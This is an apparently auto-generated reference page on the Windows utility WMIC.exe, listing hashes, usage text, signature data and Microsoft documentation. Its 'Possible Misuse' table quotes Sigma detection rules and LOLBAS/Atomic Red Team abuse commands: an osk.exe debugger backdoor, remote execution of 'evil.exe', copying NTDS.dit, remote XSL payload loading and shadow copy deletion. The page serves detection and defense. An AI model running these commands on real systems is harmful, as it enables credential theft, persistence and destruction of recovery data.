WMIC.exe
- File Path: C:\WINDOWS\system32\wbem\WMIC.exe
- Description: WMI Commandline Utility
Hashes
Type | Hash |
---|---|
MD5 | B524D1706D895A504B192F864D50AEC3 |
SHA1 | 264640D9AD805A0DB59DF31F5CCCB64C7EEA4071 |
SHA256 | 9CA09A4366F3EF2006BE964CB0DE037219A311A2D49AAFAFA2C5BDC736DCE1BE |
SHA384 | F9E25DDC26896A2CB7D225158425E770EB7E6477DFB4D757ACD8D1DAF33D01E68A0492DD5C30D3A074A2C2651E134A19 |
SHA512 | BFC5FF3051B2DCD9DC94AAB691E8078D76BCADC4238E503CC66F2158164DEA7AAE0BF505C14F7A048C8CB21FF1B257CD2354587EDB58A6A1E695A03DF0315DA0 |
SSDEEP | 6144:lvx6yRHcf1/L8UxUkorp/jvKwfqGS8AUrXwHrsVP2d5ITGH5enh:Bx6yaJ84WxJJAeAHrsVuYTGH0nh |
IMP | 5268CCA80CACD62FE845F6ADABDFC03A |
PESHA1 | 5D4B3382BBF803840F3D8F5961177D730408CF60 |
PE256 | 85B27582E008F4780D821687ED16F86CFA2E3DD38A29A0BB2B2FA7D1C0B0113A |
Runtime Data
Usage (stdout):
WMIC is deprecated.
[global switches] <command>
The following global switches are available:
/NAMESPACE Path for the namespace the alias operate against.
/ROLE Path for the role containing the alias definitions.
/NODE Servers the alias will operate against.
/IMPLEVEL Client impersonation level.
/AUTHLEVEL Client authentication level.
/LOCALE Language id the client should use.
/PRIVILEGES Enable or disable all privileges.
/TRACE Outputs debugging information to stderr.
/RECORD Logs all input commands and output.
/INTERACTIVE Sets or resets the interactive mode.
/FAILFAST Sets or resets the FailFast mode.
/USER User to be used during the session.
/PASSWORD Password to be used for session login.
/OUTPUT Specifies the mode for output redirection.
/APPEND Specifies the mode for output redirection.
/AGGREGATE Sets or resets aggregate mode.
/AUTHORITY Specifies the <authority type> for the connection.
/?[:<BRIEF|FULL>] Usage information.
For more information on a specific global switch, type: switch-name /?
The following alias/es are available in the current role:
ALIAS - Access to the aliases available on the local system
BASEBOARD - Base board (also known as a motherboard or system board) management.
BIOS - Basic input/output services (BIOS) management.
BOOTCONFIG - Boot configuration management.
CDROM - CD-ROM management.
COMPUTERSYSTEM - Computer system management.
CPU - CPU management.
CSPRODUCT - Computer system product information from SMBIOS.
DATAFILE - DataFile Management.
DCOMAPP - DCOM Application management.
DESKTOP - User's Desktop management.
DESKTOPMONITOR - Desktop Monitor management.
DEVICEMEMORYADDRESS - Device memory addresses management.
DISKDRIVE - Physical disk drive management.
DISKQUOTA - Disk space usage for NTFS volumes.
DMACHANNEL - Direct memory access (DMA) channel management.
ENVIRONMENT - System environment settings management.
FSDIR - Filesystem directory entry management.
GROUP - Group account management.
IDECONTROLLER - IDE Controller management.
IRQ - Interrupt request line (IRQ) management.
JOB - Provides access to the jobs scheduled using the schedule service.
LOADORDER - Management of system services that define execution dependencies.
LOGICALDISK - Local storage device management.
LOGON - LOGON Sessions.
MEMCACHE - Cache memory management.
MEMORYCHIP - Memory chip information.
MEMPHYSICAL - Computer system's physical memory management.
NETCLIENT - Network Client management.
NETLOGIN - Network login information (of a particular user) management.
NETPROTOCOL - Protocols (and their network characteristics) management.
NETUSE - Active network connection management.
NIC - Network Interface Controller (NIC) management.
NICCONFIG - Network adapter management.
NTDOMAIN - NT Domain management.
NTEVENT - Entries in the NT Event Log.
NTEVENTLOG - NT eventlog file management.
ONBOARDDEVICE - Management of common adapter devices built into the motherboard (system board).
OS - Installed Operating System/s management.
PAGEFILE - Virtual memory file swapping management.
PAGEFILESET - Page file settings management.
PARTITION - Management of partitioned areas of a physical disk.
PORT - I/O port management.
PORTCONNECTOR - Physical connection ports management.
PRINTER - Printer device management.
PRINTERCONFIG - Printer device configuration management.
PRINTJOB - Print job management.
PROCESS - Process management.
PRODUCT - Installation package task management.
QFE - Quick Fix Engineering.
QUOTASETTING - Setting information for disk quotas on a volume.
RDACCOUNT - Remote Desktop connection permission management.
RDNIC - Remote Desktop connection management on a specific network adapter.
RDPERMISSIONS - Permissions to a specific Remote Desktop connection.
RDTOGGLE - Turning Remote Desktop listener on or off remotely.
RECOVEROS - Information that will be gathered from memory when the operating system fails.
REGISTRY - Computer system registry management.
SCSICONTROLLER - SCSI Controller management.
SERVER - Server information management.
SERVICE - Service application management.
SHADOWCOPY - Shadow copy management.
SHADOWSTORAGE - Shadow copy storage area management.
SHARE - Shared resource management.
SOFTWAREELEMENT - Management of the elements of a software product installed on a system.
SOFTWAREFEATURE - Management of software product subsets of SoftwareElement.
SOUNDDEV - Sound Device management.
STARTUP - Management of commands that run automatically when users log onto the computer system.
SYSACCOUNT - System account management.
SYSDRIVER - Management of the system driver for a base service.
SYSTEMENCLOSURE - Physical system enclosure management.
SYSTEMSLOT - Management of physical connection points including ports, slots and peripherals, and proprietary connections points.
TAPEDRIVE - Tape drive management.
TEMPERATURE - Data management of a temperature sensor (electronic thermometer).
TIMEZONE - Time zone data management.
UPS - Uninterruptible power supply (UPS) management.
USERACCOUNT - User account management.
VOLTAGE - Voltage sensor (electronic voltmeter) data management.
VOLUME - Local storage volume management.
VOLUMEQUOTASETTING - Associates the disk quota setting with a specific disk volume.
VOLUMEUSERQUOTA - Per user storage volume quota management.
WMISET - WMI service operational parameters management.
For more information on a specific alias, type: alias /?
CLASS - Escapes to full WMI schema.
PATH - Escapes to full WMI object paths.
CONTEXT - Displays the state of all the global switches.
QUIT/EXIT - Exits the program.
For more information on CLASS/PATH/CONTEXT, type: (CLASS | PATH | CONTEXT) /?
Usage (stderr):
help - Alias not found.
Loaded Modules:
Path |
---|
C:\WINDOWS\System32\KERNEL32.DLL |
C:\WINDOWS\System32\KERNELBASE.dll |
C:\WINDOWS\SYSTEM32\ntdll.dll |
C:\WINDOWS\system32\wbem\WMIC.exe |
Signature
- Status: Signature verified.
- Serial: 33000002ED2C45E4C145CF48440000000002ED
- Thumbprint: 312860D2047EB81F8F58C29FF19ECDB4C634CF6A
- Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
- Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
File Metadata
- Original Filename: wmic.exe.mui
- Product Name: Microsoft Windows Operating System
- Company Name: Microsoft Corporation
- File Version: 10.0.22000.1 (WinBuild.160101.0800)
- Product Version: 10.0.22000.1
- Language: English (United States)
- Legal Copyright: Microsoft Corporation. All rights reserved.
- Machine Type: 64-bit
File Scan
- VirusTotal Detections: 0/72
- VirusTotal Link: https://www.virustotal.com/gui/file/9ca09a4366f3ef2006be964cb0de037219a311a2d49aafafa2c5bdc736dce1be/detection
Possible Misuse
The following table contains possible examples of WMIC.exe being misused. While WMIC.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.
Source | Source File | Example | License |
---|---|---|---|
sigma | godmode_sigma_rule.yml | - '\wmic.exe' | DRL 1.0 |
sigma | win_susp_logon_explicit_credentials.yml | - '\wmic.exe' | DRL 1.0 |
sigma | sysmon_suspicious_remote_thread.yml | - '\wmic.exe' | DRL 1.0 |
sigma | file_event_win_win_shell_write_susp_directory.yml | - '\wmic.exe' # https://app.any.run/tasks/c903e9c8-0350-440c-8688-3881b556b8e0/ | DRL 1.0 |
sigma | image_load_suspicious_dbghelp_dbgcore_load.yml | - '\wmic.exe' | DRL 1.0 |
sigma | image_load_wmic_remote_xsl_scripting_dlls.yml | Image\|endswith: '\wmic.exe' | DRL 1.0 |
sigma | image_load_wmi_module_load.yml | - 'C:\Windows\System32\wbem\WMIC.exe' | DRL 1.0 |
sigma | proc_creation_win_bypass_squiblytwo.yml | - '\wmic.exe' | DRL 1.0 |
sigma | proc_creation_win_crime_maze_ransomware.yml | Image\|endswith: '\wmic.exe' | DRL 1.0 |
sigma | proc_creation_win_html_help_spawn.yml | - '\wmic.exe' | DRL 1.0 |
sigma | proc_creation_win_local_system_owner_account_discovery.yml | - Image\|endswith: '\wmic.exe' | DRL 1.0 |
sigma | proc_creation_win_mal_blue_mockingbird.yml | Image\|endswith: '\wmic.exe' | DRL 1.0 |
sigma | proc_creation_win_office_applications_spawning_wmi_commandline.yml | - Image: '\wbem\WMIC.exe' | DRL 1.0 |
sigma | proc_creation_win_office_applications_spawning_wmi_commandline.yml | - OriginalFileName: 'wmic.exe' | DRL 1.0 |
sigma | proc_creation_win_office_from_proxy_executing_regsvr32_payload.yml | - Image\|endswith: '\wbem\WMIC.exe' | DRL 1.0 |
sigma | proc_creation_win_office_from_proxy_executing_regsvr32_payload.yml | - OriginalFileName: 'wmic.exe' | DRL 1.0 |
sigma | proc_creation_win_office_from_proxy_executing_regsvr32_payload2.yml | - Image\|endswith: '\wbem\WMIC.exe' | DRL 1.0 |
sigma | proc_creation_win_office_shell.yml | - '\wmic.exe' # https://app.any.run/tasks/c903e9c8-0350-440c-8688-3881b556b8e0/ | DRL 1.0 |
sigma | proc_creation_win_office_spawning_wmi_commandline.yml | - Image\|endswith: '\wbem\WMIC.exe' | DRL 1.0 |
sigma | proc_creation_win_outlook_shell.yml | - '\wmic.exe' # https://app.any.run/tasks/c903e9c8-0350-440c-8688-3881b556b8e0/ | DRL 1.0 |
sigma | proc_creation_win_renamed_binary.yml | - 'wmic.exe' | DRL 1.0 |
sigma | proc_creation_win_renamed_binary.yml | - '\wmic.exe' | DRL 1.0 |
sigma | proc_creation_win_renamed_binary_highly_relevant.yml | - 'wmic.exe' | DRL 1.0 |
sigma | proc_creation_win_renamed_binary_highly_relevant.yml | - '\wmic.exe' | DRL 1.0 |
sigma | proc_creation_win_shadow_copies_creation.yml | - '\wmic.exe' | DRL 1.0 |
sigma | proc_creation_win_shadow_copies_deletion.yml | - '\wmic.exe' | DRL 1.0 |
sigma | proc_creation_win_suspicious_ad_reco.yml | Image\|endswith: '\wmic.exe' | DRL 1.0 |
sigma | proc_creation_win_susp_eventlog_clear.yml | Image\|endswith: '\wmic.exe' | DRL 1.0 |
sigma | proc_creation_win_susp_recon.yml | - '\WMIC.exe' | DRL 1.0 |
sigma | proc_creation_win_susp_servu_process_pattern.yml | - '\wmic.exe' # https://app.any.run/tasks/c903e9c8-0350-440c-8688-3881b556b8e0/ | DRL 1.0 |
sigma | proc_creation_win_susp_shell_spawn_by_java.yml | - '\wmic.exe' # https://app.any.run/tasks/c903e9c8-0350-440c-8688-3881b556b8e0/ | DRL 1.0 |
sigma | proc_creation_win_susp_shell_spawn_by_java_keytool.yml | - '\wmic.exe' | DRL 1.0 |
sigma | proc_creation_win_susp_spoolsv_child_processes.yml | - \wmic.exe | DRL 1.0 |
sigma | proc_creation_win_susp_wmi_execution.yml | Image\|endswith: '\wmic.exe' | DRL 1.0 |
sigma | proc_creation_win_webshell_detection.yml | Image\|endswith: '\wmic.exe' | DRL 1.0 |
sigma | proc_creation_win_wmic_reconnaissance.yml | Image\|endswith: \WMIC.exe | DRL 1.0 |
sigma | proc_creation_win_wmic_remote_service.yml | Image\|endswith: \WMIC.exe | DRL 1.0 |
sigma | proc_creation_win_wmic_remove_application.yml | Image\|endswith: \WMIC.exe | DRL 1.0 |
sigma | proc_creation_win_xsl_script_processing.yml | - Image\|endswith: '\wmic.exe' | DRL 1.0 |
sigma | proc_creation_win_xsl_script_processing.yml | - WMIC.exe FP depend on scripts and administrative methods used in the monitored environment. | DRL 1.0 |
LOLBAS | Wmic.yml | Name: Wmic.exe | |
LOLBAS | Wmic.yml | - Command: wmic.exe process call create "c:\ads\file.txt:program.exe" | |
LOLBAS | Wmic.yml | - Command: wmic.exe process call create calc | |
LOLBAS | Wmic.yml | - Command: wmic.exe process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f" | |
LOLBAS | Wmic.yml | - Command: wmic.exe /node:"192.168.0.1" process call create "evil.exe" | |
LOLBAS | Wmic.yml | - Command: wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "at 9:00PM c:\GoogleUpdate.exe ^> c:\notGoogleUpdateResults.txt" | |
LOLBAS | Wmic.yml | - Command: wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "cmd /c vssadmin create shadow /for=C:\Windows\NTDS\NTDS.dit > c:\not_the_NTDS.dit" | |
LOLBAS | Wmic.yml | - Command: wmic.exe process get brief /format:"https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl" | |
LOLBAS | Wmic.yml | - Command: wmic.exe process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl" | |
LOLBAS | Wmic.yml | - Path: C:\Windows\System32\wbem\wmic.exe | |
LOLBAS | Wmic.yml | - Path: C:\Windows\SysWOW64\wbem\wmic.exe | |
LOLBAS | Wmic.yml | - IOC: DotNet CLR libraries loaded into wmic.exe | |
LOLBAS | Wmic.yml | - IOC: DotNet CLR Usage Log - wmic.exe.log | |
atomic-red-team | T1047.md | This test uses wmic.exe to execute a process on the local host. | MIT License. © 2018 Red Canary |
atomic-red-team | T1047.md | This test uses wmic.exe to execute a process on a remote host. Specify a valid value for remote IP using the node parameter. | MIT License. © 2018 Red Canary |
atomic-red-team | T1047.md | This test uses wmic.exe to execute a DLL function using rundll32. Specify a valid value for remote IP using the node parameter. | MIT License. © 2018 Red Canary |
atomic-red-team | T1069.001.md | Utilizing wmic.exe to enumerate groups on the local system. Upon execution, information will be displayed of local groups on system. | MIT License. © 2018 Red Canary |
atomic-red-team | T1069.001.md | wmic.exe group get name | MIT License. © 2018 Red Canary |
atomic-red-team | T1220.md | | wmic_command | WMI command to execute using wmic.exe | String | process list| | MIT License. © 2018 Red Canary |
atomic-red-team | T1490.md | wmic.exe shadowcopy delete | MIT License. © 2018 Red Canary |
atomic-red-team | T1518.001.md | wmic.exe /Namespace:\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List | MIT License. © 2018 Red Canary |
Additional Info*
*The information below is copied from MicrosoftDocs, which is maintained by Microsoft. Available under CC BY 4.0 license.
wmic
Displays WMI information inside an interactive command shell.
Syntax
wmic </parameter>
Sub-commands
The following sub-commands are available at all times:
Sub-command | Description |
---|---|
class | Escapes from the default alias mode of WMIC to access classes in the WMI schema directly. |
path | Escapes from the default alias mode of WMIC to access instances in the WMI schema directly. |
context | Displays the current values of all global switches. |
[quit \| exit] | Exits the WMIC command shell. |
Examples
To display the current values of all global switches, type:
wmic context
Output similar to the following displays:
NAMESPACE : root\cimv2
ROLE : root\cli
NODE(S) : BOBENTERPRISE
IMPLEVEL : IMPERSONATE
[AUTHORITY : N/A]
AUTHLEVEL : PKTPRIVACY
LOCALE : ms_409
PRIVILEGES : ENABLE
TRACE : OFF
RECORD : N/A
INTERACTIVE : OFF
FAILFAST : OFF
OUTPUT : STDOUT
APPEND : STDOUT
USER : N/A
AGGREGATE : ON
To change the language ID used by the command line to English (locale ID 409), type:
wmic /locale:ms_409
Additional References
MIT License. Copyright (c) 2020-2021 Strontic.